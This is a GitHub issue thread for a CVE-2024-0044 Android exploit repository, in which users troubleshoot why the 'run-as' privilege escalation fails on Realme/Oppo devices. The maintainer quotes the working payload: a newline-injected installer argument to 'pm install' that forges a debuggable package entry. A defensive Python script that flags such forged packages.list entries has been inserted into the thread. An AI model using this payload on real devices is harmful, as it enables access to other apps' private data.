0xbinder / CVE-2024-0044

CVE-2024-0044: a "run-as any app" high-severity vulnerability affecting Android versions 12 and 13

Run-as doesn't seem to work on realme/oppo devices #11

Open mind-spacer opened 4 months ago

mind-spacer commented 4 months ago

I have tried on the Realme/Oppo devices, but it is returning this error.

```
RE879EL1:/ $ run-as victim
run-as: unknown package: victim
```

I looked into the /data/system/packages.list file, I found that the victim entry is not there (somehow it is getting trimmed out). How to resolve this?

0xbinder commented 4 months ago

What output does it give after running the payload part

```
PAYLOAD="@null

victim id 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
```

and `pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk`?

mind-spacer commented 4 months ago

Apk is getting installed and it returns success

FYI, I have tested on a Samsung device, which works perfectly fine. Then I pulled the packages.list from the dev; it is showing a new entry of "victim" as mentioned in the PAYLOAD. But in the case of Realme, there is no new entry in the packages.list file other than the F-droid.apk package.

Also in realme, packages are getting installed as 'pc' instead of @null

This is the Samsung's /data/system/packages.list:

```
org.fdroid.fdroid 10109 0 /data/user/0/org.fdroid.fdroid default:targetSdkVersion=33 3003 0 20230324 1 @null
victim 10055 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null
```

And for Realme I am only getting this:

```
org.fdroid.fdroid 10254 0 /data/user/0/org.fdroid.fdroid default:targetSdkVersion=33 3003 0 20230324 1 pc
```
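For anyone reviewing a device after this kind of test, the following added example (not part of the thread or of the repository) audits `packages.list` text for entries shaped like the `victim` line above. The field names, the ten-field layout and the heuristics are assumptions inferred from the lines quoted in this comment.

```python
from pathlib import PurePosixPath

# Field order is an assumption inferred from the lines quoted in this thread.
FIELDS = ("name", "uid", "debuggable", "data_dir", "seinfo", "gids",
          "profileable_shell", "version", "profileable", "installer")
FIRST_APP_UID = 10000  # Android assigns installed apps UIDs from 10000 upward

# Constructed sample: the two Samsung lines quoted in the thread.
SAMPLE = """\
org.fdroid.fdroid 10109 0 /data/user/0/org.fdroid.fdroid default:targetSdkVersion=33 3003 0 20230324 1 @null
victim 10055 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null
"""


def check_entry(entry):
    """Return a list of inconsistencies for one parsed app entry."""
    issues = []
    if PurePosixPath(entry["data_dir"]).name != entry["name"]:
        issues.append("data dir does not end in the package name")
    if "." not in entry["name"]:
        issues.append("package name has no '.' separator")
    if issues and entry["debuggable"] == "1":
        issues.append("entry is marked debuggable, which run-as accepts")
    return issues


def audit(text):
    """Map a line label to its issues for each suspicious packages.list line."""
    report = {}
    for number, line in enumerate(text.splitlines(), start=1):
        parts = line.split()
        if not parts:
            continue
        if len(parts) != len(FIELDS) or not parts[1].isdigit():
            report[f"line {number}"] = ["unexpected field layout"]
            continue
        entry = dict(zip(FIELDS, parts))
        if int(entry["uid"]) < FIRST_APP_UID:
            continue  # these heuristics are only meant for app UIDs
        issues = check_entry(entry)
        if issues:
            report[entry["name"]] = issues
    return report


if __name__ == "__main__":
    for name, issues in audit(SAMPLE).items():
        print(name, "->", "; ".join(issues))
```

On the Samsung sample only `victim` is reported; the single Realme line quoted above produces no findings.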

0xbinder commented 4 months ago

The reason for the failure is attributed to the March 2024 security patch.

mind-spacer commented 4 months ago

But the tested Realme device is on the Sep 2023 security patch. It should work on this patch, right?

0xbinder commented 4 months ago

Yes, it should work. I tested the exploit on Samsung devices and Pixel. I'll check out where the issue might be, but in case you find it, just create a pull request.

mind-spacer commented 4 months ago

yeah sure.

Rocky8088 commented 3 months ago

> I have tried on the Realme/Oppo devices, but it is returning this error.
>
> ```
> RE879EL1:/ $ run-as victim
> run-as: unknown package: victim
> ```
>
> I looked into the /data/system/packages.list file, I found that the victim entry is not there (somehow it is getting trimmed out). How to resolve this?

I'm also facing this error